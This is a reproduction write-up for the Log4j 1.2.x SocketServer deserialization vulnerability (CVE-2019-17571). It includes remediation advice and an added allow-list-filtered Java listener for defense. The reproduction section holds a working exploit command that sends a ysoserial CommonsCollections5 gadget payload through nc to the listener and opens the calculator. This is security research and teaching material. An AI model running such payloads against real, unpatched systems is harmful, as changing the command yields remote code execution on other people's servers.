
Title: Apache Log4j SocketServer deserialization vulnerability reproduction


Apache Log4j SocketServer deserialization vulnerability reproduction

Apache Log4j is a Java-based logging tool. It is a project of the Apache Software Foundation and one of several Java logging frameworks.

Recently, Apache Log4j officially disclosed a deserialization vulnerability (CVE-2019-17571) in the SocketServer class of the 1.2.x series. An attacker can exploit it to achieve remote code execution.

The org.apache.log4j.net.SocketServer class in Log4j 1.2.x has a deserialization vulnerability: a socket listener created with the SocketServer class deserializes the data it receives from the connection without validating it. Combined with a deserialization gadget chain (for example one from Commons Collections), an attacker can achieve remote code execution.

Environment setup

Required jar packages: log4j-1.2.17.jar and commons-collections-3.1.jar. Start the SocketServer listener on port 8888:

java -cp log4j-1.2.17.jar:commons-collections-3.1.jar org.apache.log4j.net.SocketServer 8888 ./log4jserver.properties ./


Vulnerability reproduction

Send a ysoserial CommonsCollections5 payload to the listener:

java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections5 'open -a Calculator' | nc 127.0.0.1 8888


After sending the payload, the calculator pops up successfully:


Remediation advice

The Apache Log4j 1.2 series reached end of life in August 2015. The vulnerability has been fixed in version 2.8.2, so it is recommended to upgrade to version 2.8.2 or higher as soon as possible.

Download address: https://logging.apache.org/log4j/2.x/download.html

Stop using the Log4j SocketServer class to create socket listeners. Log4j deployments that do not use the SocketServer class are not affected by this vulnerability.
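The root cause described above is that the listener calls ObjectInputStream.readObject() on whatever a remote client sends, so any gadget chain on the classpath is instantiated. The following is an added example, not code from the original post or from the Log4j project: a hypothetical hardened listener that applies a JDK ObjectInputFilter (Java 9+) allow-list so that only the classes of a legitimate serialized LoggingEvent graph may be instantiated, and that records every rejected connection for detection. The class name FilteredLogSocketServer, the audit logger name, and the exact allow-list contents are assumptions; the list must be tuned to the serialized graph actually produced by your clients.

```java
import java.io.EOFException;
import java.io.IOException;
import java.io.InputStream;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.net.ServerSocket;
import java.net.Socket;
import org.apache.log4j.Logger;
import org.apache.log4j.spi.LoggingEvent;

/**
 * Hypothetical hardened replacement for org.apache.log4j.net.SocketServer.
 * Not Log4j code: it illustrates the control the 1.2.x listener lacks, an
 * allow-list on what ObjectInputStream may instantiate. Requires Java 9+.
 */
public class FilteredLogSocketServer {

    /**
     * Classes found in a legitimate serialized LoggingEvent graph (assumed
     * list, to be verified against real traffic). Everything else is rejected
     * by "!*" before the object is created, so gadget classes such as the
     * Commons Collections transformers never get instantiated. The limits
     * bound the depth, reference count and size of the incoming graph.
     */
    private static final String ALLOW_LIST =
          "org.apache.log4j.spi.LoggingEvent;"
        + "org.apache.log4j.spi.LocationInfo;"
        + "org.apache.log4j.spi.ThrowableInformation;"
        + "java.lang.String;java.lang.Boolean;java.lang.Integer;java.lang.Long;"
        + "java.util.Hashtable;"
        + "maxdepth=16;maxrefs=512;maxbytes=65536;"
        + "!*";

    private static final ObjectInputFilter FILTER =
        ObjectInputFilter.Config.createFilter(ALLOW_LIST);

    /**
     * Reads one event from an already-opened ObjectInputStream. A class outside
     * the allow-list makes readObject() throw InvalidClassException; the
     * top-level type is checked as well so a permitted but unexpected object
     * (e.g. a bare Hashtable) is not dispatched to appenders.
     */
    static LoggingEvent readEvent(ObjectInputStream ois)
            throws IOException, ClassNotFoundException {
        Object o = ois.readObject();
        if (!(o instanceof LoggingEvent)) {
            throw new InvalidClassException(
                "unexpected top-level object: " + o.getClass().getName());
        }
        return (LoggingEvent) o;
    }

    /** Handles one client connection: events are read until the peer closes. */
    static void serve(Socket client, Logger audit) {
        String peer = String.valueOf(client.getRemoteSocketAddress());
        try (InputStream in = client.getInputStream();
             ObjectInputStream ois = new ObjectInputStream(in)) {
            ois.setObjectInputFilter(FILTER);  // install the allow-list on this stream
            while (true) {
                LoggingEvent ev = readEvent(ois);
                Logger.getLogger(ev.getLoggerName()).callAppenders(ev);
            }
        } catch (EOFException eof) {
            // normal end of stream: client finished sending events
        } catch (InvalidClassException e) {
            // filter rejection: the peer and reason are the signal to alert on
            audit.warn("rejected serialized object from " + peer + ": " + e.getMessage());
        } catch (IOException | ClassNotFoundException e) {
            audit.warn("malformed stream from " + peer + ": " + e);
        }
    }

    public static void main(String[] args) throws IOException {
        int port = Integer.parseInt(args[0]);
        Logger audit = Logger.getLogger("socketserver.audit");  // assumed logger name
        try (ServerSocket server = new ServerSocket(port)) {
            while (true) {
                try (Socket client = server.accept()) {
                    serve(client, audit);
                }
            }
        }
    }
}
```

The filter runs before any constructor or readObject of the incoming class executes, which is why it stops gadget chains rather than merely detecting them afterwards; the audit line written on rejection is what a SOC would key on. For the Log4j 1.2.x listener itself the only real fix remains not exposing it and upgrading as stated above, because the allow-list shown here cannot be retrofitted into the shipped SocketNode class.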
